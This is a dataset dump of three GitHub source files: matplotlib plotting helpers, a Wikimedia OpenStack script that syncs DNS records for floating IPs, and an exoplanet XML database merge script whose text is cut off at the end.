\n    Example\n        x = resize(arange(100), (5,100))\n        djet = cmap_discretize(cm.jet, 5)\n        imshow(x, cmap=djet)\n    \"\"\"\n\n    cdict = cmap._segmentdata.copy()\n    # N colors\n    colors_i = np.linspace(0,1.,N)\n    # N+1 indices\n    indices = np.linspace(0,1.,N+1)\n    for key in ('red','green','blue'):\n        # Find the N colors\n        D = np.array(cdict[key])\n        #I = interpolate.interp1d(D[:,0], D[:,1])\n        #I = interpolate.interp1d(D[:,0],D[:,1])\n        colors = interp(colors_i,D[:,0],D[:,1])\n        # Place these colors at the correct indices.\n        A = np.zeros((N+1,3), float)\n        A[:,0] = indices\n        A[1:,1] = colors\n        A[:-1,2] = colors\n        # Create a tuple for the dictionary.\n        L = []\n        for l in A:\n            L.append(tuple(l))\n        cdict[key] = tuple(L)\n    # Return colormap object.\n    return plt.matplotlib.colors.LinearSegmentedColormap('colormap',cdict,1024)\n\ndef cmap_map(function,cmap):\n    \"\"\" Applies function (which should operate on vectors of shape 3:\n    [r, g, b]), on colormap cmap. 
This routine will break any discontinuous\n    points in a colormap.\n    \"\"\"\n    cdict = cmap._segmentdata\n    step_dict = {}\n    # First get the list of points where the segments start or end\n    for key in ('red','green','blue'): step_dict[key] = [x[0] for x in cdict[key]]\n    step_list = reduce(lambda x, y: x+y, step_dict.values())\n    step_list = np.array(list(set(step_list)))\n    # Then compute the LUT, and apply the function to the LUT\n    reduced_cmap = lambda step : np.array(cmap(step)[0:3])\n    old_LUT = np.array([reduced_cmap(step) for step in step_list])\n    new_LUT = np.array([function(x) for x in old_LUT])\n    # Now try to make a minimal segment definition of the new LUT\n    cdict = {}\n    for i,key in enumerate(('red','green','blue')):\n        this_cdict = {}\n        for j,step in enumerate(step_list):\n            if step in step_dict[key]:\n                this_cdict[step] = new_LUT[j,i]\n            elif new_LUT[j,i]!=old_LUT[j,i]:\n                this_cdict[step] = new_LUT[j,i]\n        colorvector = sorted(x + (x[1], ) for x in this_cdict.items())\n        cdict[key] = colorvector\n\n    return pl.matplotlib.colors.LinearSegmentedColormap('colormap',cdict,1024)\n\ndef cmap_brightened(cmap,factor=0.5):\n    \"\"\"\n    Brightens colormap cmap using a saturation factor 'factor'\n    (0.5 by default).\n    \"\"\"\n    return cmap_map(lambda x: (1.-factor) + factor*x, cmap)\n\ndef layers(field,bath,h=None,xc=None,lines=None,missingbath=-10.0,fillvalue=-9999.0,lw=0.5,plotsurface=False,**kwargs):\n    \"\"\"\n    plot 2d field as layers with pcolor based on layer heights.\n    (perfect for GETM results)\n    \n    usage: layers(2dfield[kmax,xmax],\n                  bath[xmax],\n                  h=h[kmax,xmax],\n                  xc=xc[xmax],\n                  missingbath=-10.0,\n                  fillvalue=-9999.0,\n                  lines=LineColor,\n                  lw=0.5,\n                  **kwargs)\n\n    h,xc,missingbath,fillvalue,shading and lw are optional, default is sigma\n    coordinates h=bath/kmax, default FillValue=-9999.0,\n    default lw=0.5, and default xc is the vector of array indices.\n\n    Polygons where bath == missingbath in any point are filled\n    with fillvalue and are masked afterwards.\n    The 2dfield can be preconfigured with (fillvalue)s where\n    \"layers\" should not plot any value (e.g. if certain layers\n    should be removed)\n    \n    Additional keyword arguments are passed to pcolor such as\n    cmap=cm.hsv or shading='flat'.\n\n    If lines is given, the layer interfaces are\n    plotted as lines in color e.g. 
lines='black'\n    \"\"\"\n    \n    (kmax,xmax)=field.shape\n    \n    if xc is None:\n        xc=np.arange(xmax,dtype='f')\n    \n    dx2=0.5*(xc[1]-xc[0])\n    xco=np.interp((np.arange(2*xmax+1)-1)/2.0,np.arange(xmax),xc,left=xc[0]-dx2,right=xc[-1]+dx2)\n    bathd=np.interp(xco,xc,bath,left=bath[0],right=bath[-1])\n\n    if h is None:\n        h=np.asarray([bath/kmax for k in range(kmax)])\n    \n    zi=-bath+np.cumsum(np.vstack([np.zeros((1,xmax)),h]),axis=0);\n    zd=np.zeros((kmax+1,2*xmax+1),dtype='f')\n    fieldd=np.zeros((kmax+1,2*xmax+1),dtype='f')\n    \n    for k in range(kmax+1):\n        for x in range(xmax):\n            \n            if k==kmax:\n                kf=kmax-1\n            else:\n                kf=k\n\n            if (x == 0):\n                zd[k,0]=zi[k,x]\n                zd[k,1]=zi[k,x]\n                fieldd[k,0]=field[kf,x]\n                fieldd[k,1]=field[kf,x]\n            elif (bath[x]<=missingbath):\n                zd[k,2*x+1]=fillvalue\n                fieldd[k,2*x+1]=fillvalue\n                fieldd[k,2*x]=fillvalue\n                if (bath[x-1]<=missingbath):\n                    zd[k,2*x]=fillvalue\n                else:\n                    zd[k,2*x]=zi[k,x-1]\n            else:\n                zd[k,2*x+1]=zi[k,x]\n                fieldd[k,2*x+1]=field[kf,x]\n                fieldd[k,2*x]=field[kf,x]\n                if (bath[x-1]<=missingbath):\n                    zd[k,2*x]=zi[k,x]\n                else:\n                    zd[k,2*x]=0.5*(zi[k,x-1]+zi[k,x])\n            \n            if x == xmax-1:\n                zd[k,-1]=zi[k,x]\n                fieldd[k,-1]=field[kf,x]\n\n    fmasked=np.ma.masked_where(fieldd==fillvalue,fieldd)\n    \n    ret=pl.pcolor(xco,np.ma.array(zd,mask=fmasked.mask),fmasked,**kwargs)\n    \n    if lines is not None:\n        if plotsurface:\n            lastind=kmax+1\n        else:\n            lastind=kmax\n        xi=np.array([xc for k in range(lastind)])\n        bathi=np.array([bath for k in range(lastind)])\n        plt.plot(xi.T,np.ma.masked_where(bathi.T<=-10.0,zi[:lastind,:].T), \\\n                 color=lines,lw=lw)\n    plt.axis('tight')\n    return ret\n\n\ndef ztodepth(ax=None,ylabelstr='depth [m]'):\n    \"\"\"\n    ztodepth - change negative z-ax ticklabels \n    on the y-axis to positive depths\n\n    usage: ztodepth(ax=gca(),\n                    ylabelstr='depth [m]')\n\n    ztodepth gets the yticks and creates positive yticklabels\n    for annotation in depth instead of position on z-axis.\n    It's recommended to change yticks if needed before\n    running ztodepth.\n\n    If ylabelstr is not set to \"None\", then the y-axis gets\n    the label \"depth [m]\" or other specified with ylabelstr.\n\n    \"\"\"\n    \n    if ax is None:\n        ax = plt.gca()\n    \n    yt = ax.get_yticks()\n    dtl = [str(y*-1.0) for y in yt]\n    ax.set_yticklabels(dtl)\n    if ylabelstr is not None:\n        ax.set_ylabel(ylabelstr)\n\ndef drawscale(m,lon,lat,length,yoffset=None,fontsize=8.0,linewidth=0.5):\n    \"\"\"draw a fancy map scale from lon-length/2,lat-yoffset to\n    lon-length/2,lat-yoffset, label it with actual distance in km\n    \n    usage drawscale(m - mapping object,\n                    lon - lon value of center of scale\n                    lat - lat value of center of scale\n                    length - maximum length shown by scale in km\n                    yoffset - height of scale in \"km\"\n                    fontsize - fontsize of ticklabels\n                    linewidth - width of used lines)\n    \n    \"\"\"\n    length = length*1000 #input length is km\n\n    # idea for future: try to divide by 5, 4 and 3 to find\n    # the best split factor and then create the x-coordinates\n\n    #we need 5 sets of x coordinates (in map units)\n    #center of scale\n    xc,yc = m(lon,lat)\n    #left edge of scale\n    lon1,lat1 = m(xc-length/2,yc,inverse=True)\n    x1,y1 = m(lon1,lat1)\n    #quarter scale\n    lon2,lat2 = m(xc-length/4,yc,inverse=True)\n    x2,y2 = m(lon2,lat2)\n    #three quarter scale\n    lon3,lat3 = m(xc+length/4,yc,inverse=True)\n    x3,y3 = m(lon3,lat3)\n    #right edge of scale\n    lon4,lat4 = m(xc+length/2,yc,inverse=True)\n    x4,y4 = m(lon4,lat4)\n\n    if yoffset is None:\n        yoffset = 0.05*length\n    else:\n        yoffset = 1000.0*yoffset\n\n    #plot top line\n    ytop = yc+yoffset/2\n    ybottom = yc-yoffset/2\n    ytick = ybottom - yoffset/2\n    
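# tick labels will sit half a yoffset below the tick marks\n    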
ytext = ytick - yoffset/2\n    m.plot([x1,x4],[ytop,ytop],color='k',lw=linewidth)\n    #plot bottom line\n    m.plot([x1,x4],[ybottom,ybottom],color='k',lw=linewidth)\n    #plot left edge\n    m.plot([x1,x1],[ybottom,ytop],color='k',lw=linewidth)\n    #plot right edge\n    m.plot([x4,x4],[ybottom,ytop],color='k',lw=linewidth)\n\n    #make a filled black box from left edge to 1/4 way across\n    plt.fill([x1,x2,x2,x1,x1],[ytop,ytop,ybottom,ybottom,ytop], \\\n             'k',lw=linewidth)\n    #make a filled white box from 1/4 way across to 1/2 way across\n    plt.fill([x2,xc,xc,x2,x2],[ytop,ytop,ybottom,ybottom,ytop], \\\n             'w',lw=linewidth)\n    #make a filled white box from 1/2 way across to 3/4 way across\n    plt.fill([xc,x3,x3,xc,xc],[ytop,ytop,ybottom,ybottom,ytop], \\\n             'k',lw=linewidth)\n    #make a filled white box from 3/4 way across to end\n    plt.fill([x3,x4,x4,x3,x3],[ytop,ytop,ybottom,ybottom,ytop], \\\n             'w',lw=linewidth)\n\n    #plot 3 tick marks at left edge, center, and right edge\n    m.plot([x1,x1],[ytick,ybottom],color='k',lw=linewidth)\n    m.plot([xc,xc],[ytick,ybottom],color='k',lw=linewidth)\n    m.plot([x4,x4],[ytick,ybottom],color='k',lw=linewidth)\n\n    #label 3 tick marks\n    plt.text(x1,ytext,'%d' % (0),\\\n             horizontalalignment='center',\\\n             verticalalignment='top',\\\n             fontsize=fontsize)\n    plt.text(xc,ytext,'%d' % (round((length/2)/1000)),\\\n             horizontalalignment='center',\\\n             verticalalignment='top',\\\n             fontsize=fontsize)\n    plt.text(x4,ytext,'%d' % (round((length)/1000)),\\\n             horizontalalignment='center',\\\n             verticalalignment='top',\\\n             fontsize=fontsize)\n\n    #put units on top\n    plt.text(xc,ytop+yoffset/2,'km',\\\n             horizontalalignment='center',\\\n             verticalalignment='bottom',\\\n             fontsize=fontsize)\n\ndef jetWoGn(reverse=False):\n    \"\"\"\n    jetWoGn(reverse=False)\n    - returning a colormap similar to cm.jet, but without green.\n      if reverse=True, the map starts with red instead of blue.\n    \"\"\"\n    m=18 # magic number, which works fine\n    m0=pl.floor(m*0.0)\n    m1=pl.floor(m*0.2)\n    m2=pl.floor(m*0.2)\n    m3=pl.floor(m/2)-m2-m1\n\n    b_ = np.hstack( (0.4*np.arange(m1)/(m1-1.)+0.6, np.ones((m2+m3,)) ) )\n    g_ = np.hstack( (np.zeros((m1,)),np.arange(m2)/(m2-1.),np.ones((m3,))) )\n    r_ = np.hstack( (np.zeros((m1,)),np.zeros((m2,)),np.arange(m3)/(m3-1.)))\n\n    r = np.hstack((r_,pl.flipud(b_)))\n    g = np.hstack((g_,pl.flipud(g_)))\n    b = np.hstack((b_,pl.flipud(r_)))\n\n    if reverse:\n        r = pl.flipud(r)\n        g = pl.flipud(g)\n        b = pl.flipud(b)\n\n    ra = pl.linspace(0.0,1.0,m)\n\n    cdict = {'red': list(zip(ra,r,r)),\n            'green': list(zip(ra,g,g)),\n            'blue': list(zip(ra,b,b))}\n\n    return pl.matplotlib.colors.LinearSegmentedColormap('new_RdBl',cdict,256)\n\n","repo_name":"hetland/octant","sub_path":"octant/sandbox/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":14014,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"68"} +{"seq_id":"2145615722","text":"import os\nimport argparse\nimport ipaddress\nimport logging\nimport re\nimport time\nimport yaml\n\nimport mwopenstackclients\n\nlogger = logging.getLogger(__name__)\n\nPROJECT_ZONE_TEMPLATE = \"{project}.wmflabs.org.\"\nFQDN_TEMPLATE = \"instance-{server}.{project}.wmflabs.org.\"\nFQDN_REGEX = FQDN_TEMPLATE.replace(r\".\", r\"\\.\").format(\n    server=\"(.*)\", project=\"{project}\"\n)\nMANAGED_DESCRIPTION = (\n    \"MANAGED BY dns-floating-ip-updater.py IN PUPPET - DO NOT UPDATE OR DELETE\"\n)\n\n\ndef managed_description_error(action, type, label):\n    logger.warning(\n        \"Did not %s %s record for %s due to lack of managed_description!\",\n        action,\n        type,\n        
label,\n )\n\n\ndef update_tenant(\n client,\n tenant,\n project_main_zone_ids,\n public_addrs,\n existing_As,\n):\n logger.debug(\"Updating project %s\", tenant.name)\n if tenant.name == \"admin\":\n return\n\n server_addresses = {}\n nova_client = client.novaclient(tenant.name)\n # Go through every instance\n for server in nova_client.servers.list():\n for network_name, addresses in server.addresses.items():\n public = [\n str(ip[\"addr\"])\n for ip in addresses\n if ip[\"OS-EXT-IPS:type\"] == \"floating\"\n ]\n # If the instance has a public IP...\n if public:\n # Record their public IPs and generate their public name\n # according to FQDN_TEMPLATE. Technically there can be more\n # than one floating (and/or fixed) IP Although this is never\n # practically the case...\n server_addresses[server.name] = public\n A_FQDN = FQDN_TEMPLATE.format(\n server=server.name, project=tenant.name\n )\n public_addrs[A_FQDN, tenant.name] = True, public\n logger.debug(\"Found public IP %s -> %s\", public, A_FQDN)\n\n dns = mwopenstackclients.DnsManager(client, tenant=tenant.name)\n existing_match_regex = re.compile(FQDN_REGEX.format(project=tenant.name))\n # Now go through every zone the project controls\n for zone in dns.zones():\n logger.debug(\"Checking zone %s\", zone[\"name\"])\n # If this is their main zone, record the ID for later use\n if zone[\"name\"] == PROJECT_ZONE_TEMPLATE.format(project=tenant.name):\n project_main_zone_ids[tenant.name] = zone[\"id\"]\n\n # Go through every recordset in the zone\n for recordset in dns.recordsets(zone[\"id\"]):\n logger.debug(\n \"Found recordset %s %s\", recordset[\"name\"], recordset[\"type\"]\n )\n existing_As.append(recordset[\"name\"])\n # No IPv6 support in labs so no AAAAs\n if recordset[\"type\"] != \"A\":\n continue\n\n match = existing_match_regex.match(recordset[\"name\"])\n if match:\n # Matches instances for this project, managed by this script\n if match.group(1) in server_addresses and set(\n recordset[\"records\"]\n ) != set(server_addresses[match.group(1)]):\n # ... But instance has a different set of IPs. Update!\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n new_records = server_addresses[match.group(1)]\n logger.info(\n \"Updating type A record for %s\"\n \" - instance has different IPs - correct: %s\"\n \" vs. current: %s\",\n recordset[\"name\"],\n str(new_records),\n str(recordset[\"records\"]),\n )\n try:\n dns.update_recordset(\n zone[\"id\"],\n recordset[\"id\"],\n new_records,\n )\n except Exception:\n logger.exception(\n \"Failed to update %s\", recordset[\"name\"]\n )\n else:\n managed_description_error(\"update\", \"A\", recordset[\"name\"])\n elif match.group(1) not in server_addresses:\n # ... But instance does not actually exist. 
Delete!\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n logger.info(\n \"Deleting type A record for %s \"\n \" - instance does not exist\",\n recordset[\"name\"],\n )\n try:\n dns.delete_recordset(zone[\"id\"], recordset[\"id\"])\n except Exception:\n logger.exception(\n \"Failed to delete %s\", recordset[\"name\"]\n )\n else:\n managed_description_error(\"delete\", \"A\", recordset[\"name\"])\n elif \"*\" not in recordset[\"name\"]:\n # Recordset is not one of our FQDN_TEMPLATE ones, so just\n # store it so we can reflect its existence in PTR records\n # where appropriate.\n public_addrs[recordset[\"name\"], tenant.name] = (\n False,\n recordset[\"records\"],\n )\n\n\ndef try_update_tenant(\n client,\n tenant,\n project_main_zone_ids,\n public_addrs,\n existing_As,\n retries,\n retry_interval,\n):\n retry = 0\n while retry <= retries:\n try:\n update_tenant(\n client=client,\n tenant=tenant,\n project_main_zone_ids=project_main_zone_ids,\n public_addrs=public_addrs,\n existing_As=existing_As\n )\n return\n except Exception:\n retry += 1\n logger.exception(\n \"Failed to update tenant %s, retrying %s out of %s\"\n % (tenant.name, retry, retries)\n )\n if retry == retries:\n raise\n time.sleep(retry_interval)\n\n\ndef update(config, os_cloud, retries, retry_interval):\n floating_ip_ptr_fqdn_matching_regex = re.compile(\n config[\"floating_ip_ptr_fqdn_matching_regex\"]\n )\n\n client = mwopenstackclients.Clients(oscloud=os_cloud)\n\n project_main_zone_ids = {}\n public_addrs = {}\n existing_As = []\n # Go through every tenant\n for tenant in client.keystoneclient().projects.list():\n logger.info(\"Trying tenant %s\", tenant.name)\n try_update_tenant(\n client=client,\n tenant=tenant,\n project_main_zone_ids=project_main_zone_ids,\n public_addrs=public_addrs,\n existing_As=existing_As,\n retries=retries,\n retry_interval=retry_interval,\n )\n\n # Now we go through all the A record data we have stored\n public_PTRs = {}\n for (A_FQDN, project), (managed_here, IPs) in public_addrs.items():\n # Set up any that need to be and don't already exist\n if managed_here and A_FQDN not in existing_As:\n dns = mwopenstackclients.DnsManager(client, tenant=project)\n # Create instance-$instance.$project.wmflabs.org 120 IN A $IP\n # No IPv6 support in labs so no AAAAs\n logger.info(\"Creating A record for %s\", A_FQDN)\n if project in project_main_zone_ids:\n try:\n dns.create_recordset(\n project_main_zone_ids[project],\n A_FQDN,\n \"A\",\n IPs,\n description=MANAGED_DESCRIPTION,\n )\n except Exception:\n logger.exception(\"Failed to create %s\", A_FQDN)\n else:\n logger.warning(\"Oops! No main zone for project %s.\", project)\n\n # Generate PTR record data, handling rewriting for RFC 2317 delegation as\n # configured\n for IP in IPs:\n PTR_FQDN = ipaddress.ip_address(IP).reverse_pointer + \".\"\n delegated_PTR_FQDN = floating_ip_ptr_fqdn_matching_regex.sub(\n config[\"floating_ip_ptr_fqdn_replacement_pattern\"], PTR_FQDN\n )\n if delegated_PTR_FQDN.endswith(config[\"floating_ip_ptr_zone\"]):\n if delegated_PTR_FQDN in public_PTRs:\n public_PTRs[delegated_PTR_FQDN].append(A_FQDN)\n else:\n public_PTRs[delegated_PTR_FQDN] = [A_FQDN]\n else:\n logger.warning(\n \"Not handling %s\" + \" because it doesn't end with %s\",\n delegated_PTR_FQDN,\n config[\"floating_ip_ptr_zone\"],\n )\n\n # Clean up reverse proxies. We don't want to generate PTR records for dozens\n # or hundreds of hostnames that are sharing a single reverse proxy like\n # project-proxy handles. 
If any IP has more than 10 reverse mappings then we\n # will try to figure out a reasonable truncated list.\n proxies = (k for k in public_PTRs if len(public_PTRs[k]) > 10)\n proxy_fqdn_re = re.compile(\n FQDN_TEMPLATE.replace(r\".\", r\"\\.\").format(server=\"(.*)\", project=\"(.*)\")\n )\n for ptr in proxies:\n logger.info(\"Trimming FQDN list for %s\", ptr)\n # Usually there will be an FQDN_TEMPLATE host in there somewhere\n fqdns = [h for h in public_PTRs[ptr] if proxy_fqdn_re.match(h)]\n if not fqdns:\n # If for some reason there are no FQDN_TEMPLATE hosts take the whole\n # giant list, but sorted just for fun\n fqdns = sorted(public_PTRs[ptr])\n # Only use the first 10 no matter how many ended up being found\n public_PTRs[ptr] = fqdns[:10]\n logger.debug(\"Trimmed FQDN list for %s is %s\", ptr, public_PTRs[ptr])\n\n # Set up designate client to write recordsets with\n dns = mwopenstackclients.DnsManager(client, tenant=\"wmflabsdotorg\")\n # Find the correct zone ID for the floating IP zone\n floating_ip_ptr_zone_id = None\n for zone in dns.zones():\n if zone[\"name\"] == config[\"floating_ip_ptr_zone\"]:\n floating_ip_ptr_zone_id = zone[\"id\"]\n break\n\n # Zone should already exist!\n assert floating_ip_ptr_zone_id is not None\n\n existing_public_PTRs = {}\n # Go through each record in the delegated PTR zone, deleting any with our\n # managed_description that don't exist and updating any that don't match our\n # public_PTRs data.\n for recordset in dns.recordsets(floating_ip_ptr_zone_id):\n existing_public_PTRs[recordset[\"name\"]] = recordset\n if recordset[\"type\"] == \"PTR\":\n if recordset[\"name\"] not in public_PTRs:\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n # Delete whole recordset, it shouldn't exist anymore.\n logger.info(\"Deleting PTR record %s\", recordset[\"name\"])\n try:\n dns.delete_recordset(floating_ip_ptr_zone_id, recordset[\"id\"])\n except Exception:\n logger.exception(\"Failed to delete %s\", recordset[\"name\"])\n else:\n managed_description_error(\"delete\", \"PTR\", recordset[\"name\"])\n continue\n new_records = set(public_PTRs[recordset[\"name\"]])\n if new_records != set(recordset[\"records\"]):\n if recordset[\"description\"] == MANAGED_DESCRIPTION:\n # Update the recordset to have the correct IPs\n logger.info(\"Updating PTR record %s\", recordset[\"name\"])\n try:\n dns.update_recordset(\n floating_ip_ptr_zone_id,\n recordset[\"id\"],\n list(new_records),\n )\n except Exception:\n logger.exception(\"Failed to update %s\", recordset[\"name\"])\n else:\n managed_description_error(\"update\", \"PTR\", recordset[\"name\"])\n\n # Create PTRs in delegated PTR zone\n for delegated_PTR_FQDN, records in public_PTRs.items():\n # We already dealt with updating existing PTRs above.\n if delegated_PTR_FQDN not in existing_public_PTRs:\n logger.info(\n \"Creating PTR record %s pointing to %s\",\n delegated_PTR_FQDN,\n str(records),\n )\n try:\n dns.create_recordset(\n floating_ip_ptr_zone_id,\n delegated_PTR_FQDN,\n \"PTR\",\n records,\n description=MANAGED_DESCRIPTION,\n )\n except Exception:\n logger.exception(\"Failed to create %s\", delegated_PTR_FQDN)\n\n\ndef main():\n argparser = argparse.ArgumentParser(\n description=\"Update reverse DNS records for floating IPs\"\n )\n argparser.add_argument(\n \"-v\",\n \"--verbose\",\n action=\"count\",\n default=0,\n dest=\"loglevel\",\n help=(\n \"Increase logging verbosity, specify many times for more verbosity\"\n ),\n )\n argparser.add_argument(\n \"--config-file\",\n help=\"Path to config file\",\n 
default=\"/etc/wmcs-dns-floating-ip-updater.yaml\",\n type=argparse.FileType(\"r\"),\n )\n argparser.add_argument(\n \"--os-cloud\",\n help=\"clouds.yaml section to use for auth\",\n default=\"novaadmin\",\n )\n args = argparser.parse_args()\n\n logging.basicConfig(\n level=max(logging.DEBUG, logging.WARNING - (10 * args.loglevel)),\n format=\"%(asctime)s %(name)-12s %(levelname)-8s: %(message)s\",\n datefmt=\"%Y-%m-%dT%H:%M:%SZ\",\n )\n logging.captureWarnings(True)\n # Quiet some noisy 3rd-party loggers\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n logging.getLogger(\"urllib3\").setLevel(logging.WARNING)\n logging.getLogger(\"iso8601.iso8601\").setLevel(logging.WARNING)\n\n if os.getuid() != 0:\n logging.critical(\"root required\")\n exit(1)\n\n config = yaml.safe_load(args.config_file)\n retries = config.get(\"retries\", 2)\n retry_interval = config.get(\"retry_interval\", 120)\n\n retry = 0\n while retry <= retries:\n try:\n update(\n config,\n args.os_cloud,\n retries=retries,\n retry_interval=retry_interval,\n )\n exit(0)\n except Exception:\n retry += 1\n logger.exception(\n \"Failed to update, retrying %s out of %s\" % (retry, retries)\n )\n time.sleep(retry_interval)\n\n exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wikimedia/operations-puppet","sub_path":"modules/openstack/files/designate/wmcs-dns-floating-ip-updater.py","file_name":"wmcs-dns-floating-ip-updater.py","file_ext":"py","file_size_in_byte":15010,"program_lang":"python","lang":"en","doc_type":"code","stars":244,"dataset":"github-code","pt":"68"} +{"seq_id":"22126510628","text":"#!/usr/bin/python\nimport time\nimport os\nimport glob\nimport shutil\nimport threading\n\nimport github\nimport mail\nimport xmltools\nimport multiprocessing\nimport eu\nimport nasa\nimport oec\nimport xml.etree.ElementTree as ET\n\nfrom github3 import login\n\n\nCURRENT = os.getcwd()\nDESTINATION = os.path.join(CURRENT, '_data/OEC/')\nCONFLICT = os.path.join(CURRENT, '_data/push/')\n\n\ndef file_name(dir):\n '''\n Return the directory with file name only\n :param dir: str\n :return: str\n '''\n return dir.split('/')[-1]\n\n\ndef has_attrib(ele,attr):\n return attr in ele.attrib\n\n\ndef compare_list_dir(other,oec):\n '''\n :param other: list of str\n :param oec: list of str\n :return: list of (list of str, dict)\n Return the new list of list, fist inner list in outer list stores the\n different filename exist and the second inner list will be same file name.\n '''\n\n dir_maping = {}\n # dir maping is dict stores that mapping the with same file names\n diff = []\n outer = [diff,dir_maping]\n\n # loop through director in other list\n for dir_other in other:\n marker = False\n for dir_oec in oec:\n # find the same file names\n if file_name(dir_other) == file_name(dir_oec):\n # mapping dir_other to dir_oec\n dir_maping[dir_other] = dir_oec\n marker = True\n # break out current loop\n break\n # files that are the same\n # did not find a match file name\n if marker is False:\n diff.append(dir_other)\n return outer\n\n#\n# other = ['a','b','c']\n# oec = ['a','e','t']\n# print(compare_list_dir(other,oec), flush=True)\n\ndef merge(Eother, Eoec, dirOther, dirOec, root, first, is_move):\n '''\n This is function deal with all compare cases\n :param Eother: Element tree\n :param Eoec: Element tree\n :return:\n '''\n # first use to control return once at root\n first += 1\n # loop through the child tag in Etree of other database\n for child in Eother:\n a = Eoec.getchildren()\n\n # get one element with given tag in 
current level\n        childOEC = Eoec.find(child.tag) # DON'T change this\n\n        if childOEC is not None: # find() only checks direct children\n            if child.tag == 'star' or child.tag == 'planet':\n                star_planet = Eoec.findall(child.tag)\n                for element in star_planet:\n                    merge(child, element, dirOther, dirOec, root, first, is_move)\n            # if the child tag in the third-party database has no text, just skip it\n            elif child.text is None:\n                continue\n            # the tag is a name\n            elif child.tag == 'name':\n                all_names = Eoec.findall(child.tag)\n                marker = False\n                for oec_name in all_names:\n                    if oec_name.text == child.text:\n                        marker = True\n                        break\n                # the name tag does not exist in OEC, so append it\n                if not marker:\n                    Eoec.append(child)\n            # deal with errors\n            elif 'errorplus' in child.attrib:\n                # update with the smaller error\n                try:\n                    y = float(child.attrib['errorplus'])\n                except ValueError:\n                    print(child.attrib['errorplus'], flush=True)\n                    print('Bad data in errorplus with directory name:' + str(dirOther), flush=True)\n                    break\n                if not has_attrib(childOEC,'errorplus'):\n                    childOEC.text = child.text\n                    childOEC.set('errorplus', child.attrib['errorplus'])\n                    childOEC.set('errorminus', child.attrib['errorplus'])\n                elif float(child.attrib['errorplus']) < float(childOEC.attrib['errorplus']):\n                    childOEC.text = child.text\n                    childOEC.set('errorplus', child.attrib['errorplus'])\n                    childOEC.set('errorminus', child.attrib['errorplus'])\n            # child.text is never a list at this point\n            # if the OEC tag has no text, just update it with the third-party database info\n            elif childOEC.text is None:\n                childOEC.text = child.text\n            # deal with numbers\n            # elif (child.text).replace('.','',1).isdigit():\n            #     # if not equal then up to client's decision (move to conflict area)\n            #     if child.text != childOEC.text:\n            #         move = True\n            # # any other cases\n            else:\n                # the content is not the same, so push the file to the conflict area\n                if child.text != childOEC.text:\n                    is_move = True\n                # recurse into the matching child tag\n                merge(child,childOEC,dirOther,dirOec,root,first,is_move)\n        # OEC does not have such a tag, so just add it\n        else:\n            Eoec.append(child)\n    # make sure the cleanup below runs only once, at the root call\n    if first == 0:\n        # clean up the indentation in the xml\n        xmltools.indent(Eoec, level=0)\n        # write all updates back to the xml file\n        root.write(dirOec)\n\n        # copy the file\n        if is_move:\n            try:\n                shutil.copy(dirOther, CONFLICT)\n            except IOError:\n                os.chmod(dirOther, 0o777) # ?? still can raise an exception\n                shutil.copy(dirOther, CONFLICT)\n\n        return\n\n\ndef merge_two_database(list_third,list_oec):\n    mainList = compare_list_dir(list_third ,list_oec)\n    diffList = mainList[0]\n    sameDict = mainList[1]\n    # if the file name does not exist in the OEC directory, move the file there\n    for diff_dir in diffList:\n        try:\n            shutil.copy(diff_dir, DESTINATION)\n        except IOError:\n            os.chmod(diff_dir, 0o777) # ?? 
still can raise an exception\n            shutil.copy(diff_dir, DESTINATION)\n    # merge the files that do exist in OEC; each directory gets a thread to execute merge\n    # file names within a directory are unique, so it is safe to use threading\n    for dirOther,dirOec in sameDict.items():\n        other = ET.parse(dirOther).getroot()\n        tree = ET.parse(dirOec)\n        oec = tree.getroot()\n        first = -1 # used to control the return statement in the merge recursion\n        move = False # used to decide whether a file should be moved\n        # create a thread to execute the merge function\n        t = threading.Thread(target=merge, args = (other, oec, dirOther,dirOec,tree,first,move,))\n        t.daemon = True # daemon thread so it won't block interpreter exit\n        t.start()\n        t.join()\n\n\ndef run_merge():\n    list_xmldir_nasa = glob.glob(\"_data/Nasa/*.xml\")\n    list_xmldir_eu = glob.glob(\"_data/EU/*.xml\")\n    list_xmldir_oec = glob.glob(\"_data/OEC/*.xml\")\n\n    print(\"nasa before merge size is :\" + str(len(list_xmldir_nasa)), flush=True)\n    print(\"eu before merge size is :\" + str(len(list_xmldir_eu)), flush=True)\n    print(\"oec before merge size is :\" + str(len(list_xmldir_oec)), flush=True)\n\n    print(\"start merging....\", flush=True)\n    try:\n        merge_two_database(list_xmldir_nasa, list_xmldir_oec)\n        merge_two_database(list_xmldir_eu, list_xmldir_oec)\n    except Exception:\n        pass\n    print('merge done', flush=True)\n\n    list_xmldir_nasa = glob.glob(\"_data/Nasa/*.xml\")\n    list_xmldir_eu = glob.glob(\"_data/EU/*.xml\")\n    list_xmldir_oec = glob.glob(\"_data/OEC/*.xml\")\n\n    print(\"nasa after merge size is :\" + str(len(list_xmldir_nasa)), flush=True)\n    print(\"eu after merge size is :\" + str(len(list_xmldir_eu)), flush=True)\n    print(\"oec after merge size is :\" + str(len(list_xmldir_oec)), flush=True)\n\n\ndef download_database(db):\n    if db == \"nasa\":\n        print('Start downloading Nasa', flush=True)\n        nasa.get()\n        nasa.parse()\n        print('Nasa done', flush=True)\n    elif db == \"eu\":\n        print('Start downloading EU', flush=True)\n        eu.get()\n        eu.parse()\n        print(\"EU done\", flush=True)\n    elif db == \"oec\":\n        print('Start downloading OEC', flush=True)\n        oec.get()\n        oec.parse()\n        print('OEC done', flush=True)\n\n\ndef main():\n    start_time = time.time()\n\n    download_list = [\"nasa\", \"eu\", \"oec\"]\n    pool = multiprocessing.Pool(processes=3)\n    pool.map(download_database, download_list)\n    pool.close()\n    print(\"Download complete.\", flush=True)\n    xmltools.ensure_empty_dir(\"_data/push\")\n    xmltools.ensure_empty_dir(\"_data/OEC_old\")\n    file_list = glob.glob(\"_data/OEC/*.xml\")\n    for next_file in file_list:\n        shutil.copy2(next_file, \"_data/OEC_old/\")\n\n    run_merge()\n    print(\"--- %s seconds ---\" % (time.time() - start_time), flush=True)\n\n\ndef check_difference():\n    list_xmldir_oec = glob.glob(\"_data/OEC/*.xml\")\n    result = []\n    for next_file in list_xmldir_oec:\n        try:\n            file_old = open(next_file.replace(\"_data/OEC/\", 